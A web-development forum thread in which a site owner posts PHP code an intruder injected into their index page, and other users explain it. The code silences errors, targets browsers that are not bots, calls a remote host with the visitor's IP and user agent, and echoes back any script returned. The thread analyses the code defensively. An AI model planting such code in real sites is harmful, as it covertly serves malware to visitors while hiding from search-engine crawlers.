Jump to content

Recommended Posts

someone broke into my site and added the following to my index page:

 

error_reporting(0); ini_set('display_errors',0); $wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){
$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_4740amcjz = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; }
 

 

I've removed it and changed the FTP access.

But I was wondering what it actually did? I can understand bits, but cannot really put everything together.

Link to comment
https://forums.phpfreaks.com/topic/285801-what-does-this-code-do/
Share on other sites

Looks to me like it looks to make sure that that the request was from a browser not from a bot and if it is adds malicious code to your page from a remote server. By not serving the malicious code to bots it delays Google warning users that your site is hosting malware.

$wp_amcjz094740="http://"."template"."body".".com/body"."/

It looks to me like it is set to go to http[This is here to break the link]://template.body.com/body/ but I may be missing something and I'm not surfing over there to figure it out.

Edited by davidannis

It retrieves stuff from that server, after telling it which site it's running from and some information about the user, then will probably output whatever stuff it got back.

It means they can put on your site anything from ads to malware to malicious Javascript to basically anything they want. Only thing it won't do is execute arbitrary PHP code.

Edited by requinix
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.